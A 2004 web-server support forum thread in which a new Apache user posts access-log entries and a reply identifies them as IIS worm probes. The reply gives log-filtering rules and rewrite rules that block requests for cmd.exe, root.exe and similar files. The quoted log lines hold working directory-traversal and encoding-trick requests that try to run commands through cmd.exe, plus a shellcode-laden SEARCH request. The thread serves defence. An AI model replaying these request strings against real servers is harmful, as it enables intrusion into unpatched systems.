Apache Friends Support Forum

by **motordude** » 30. December 2004 08:47

I am not sure if this is the place to post this but I'll try it. I am rather new tosetting up a webserver and am still exploring. I was looking at my apache access log and found something I am not sure what it means.

Here is a part of the log, sorry for the length

68.77.21.52 - - [29/Dec/2004:19:29:03 -0500] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02 ... " 414 309
68.77.132.153 - - [29/Dec/2004:20:01:37 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:38 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:38 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:39 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:39 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:40 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
68.77.132.153 - - [29/Dec/2004:20:01:43 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:43 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:45 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:45 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:46 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:49 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:50 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:50 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:51 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:51 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:52 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
68.77.132.153 - - [29/Dec/2004:21:36:53 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:53 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:53 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:21:36:54 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:21:36:54 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:55 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454

What is that search? And what is the "GET /Scripts portion as well. I am restricting access using .htaccess other than that I dont have anything else on the site yet. Thanks in advance

by **Maller** » 30. December 2004 10:03

I belive this is IIS worms, witch dosent effect apache webserver, but just fill up your log files .... !
There are several ways of getting theese notices out of your logs, etc using mod_log_config

Code: Select all: <IfModule mod_log_config.c> SetEnvIf Request_URI "cmd\.exe" trash SetEnvIf Request_URI "root\.exe" trash SetEnvIf Request_URI "shell\.exe" trash SetEnvIf Request_URI "default\.ida" trash SetEnvIf Request_URI "wpad\.dat" trash LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" combined CustomLog logs/access_log combined env=!trash CustomLog logs/trash_log combined env=trash <IfModule mod_deflate.c> DeflateFilterNote Input instream DeflateFilterNote Output outstream DeflateFilterNote Ratio ratio LogFormat '"%r" %{outstream}n/%{instream}n (%{ratio}n%%)' deflate CustomLog logs/deflate_log deflate env=!trash </IfModule> </IfModule>

You could also make a .htaccess file with the following txt in.

Code: Select all: <IfModule mod_rewrite.so> RewriteEngine On RewriteLog c:/apache2/logs/apdtech_rewrite.log RewriteLogLevel 0 # block user agents RewriteCond %{HTTP_USER_AGENT} ^.*MSFrontpage.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Frontpage.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Backweb.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Bandit.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Ants.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Buddy.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*zip.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Crawler.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Wget.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Grabber.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Sucker.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Downloader.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Siphon.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Collector.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Snagger.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Widow.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Snake.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Vacuum.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Pump.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Teleport.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Reaper.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Mag-Net.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Memo.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*pcBrowser.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*leech.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Stripper.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Offline.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Copier.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Mirror.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*mister.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*HMView.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*HTTrack.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*JOC.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*likse.*$ [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*Recorder.*$ RewriteRule ^/.+ - [F] # block viruses and script kiddies RewriteCond %{THE_REQUEST} default.ida RewriteRule ^.*$ - [G,L] RewriteCond %{THE_REQUEST} cmd.exe RewriteRule ^.*$ - [G,L] RewriteCond %{THE_REQUEST} root.exe RewriteRule ^.*$ - [G,L] RewriteCond %{THE_REQUEST} /scripts/ RewriteRule ^.*$ - [G,L] RewriteCond %{THE_REQUEST} _vti_ RewriteRule ^.*$ - [G,L] RewriteCond %{THE_REQUEST} shell.exe RewriteRule ^.*$ - [G,L] RewriteCond %{THE_REQUEST} nsiislog.dll RewriteRule ^.*$ - [G,L] RewriteCond %{THE_REQUEST} msadcs.dll RewriteRule ^.*$ - [G,L] </IfModule>

Apache Friends Support Forum

Apache access.log

Apache access.log

Who is online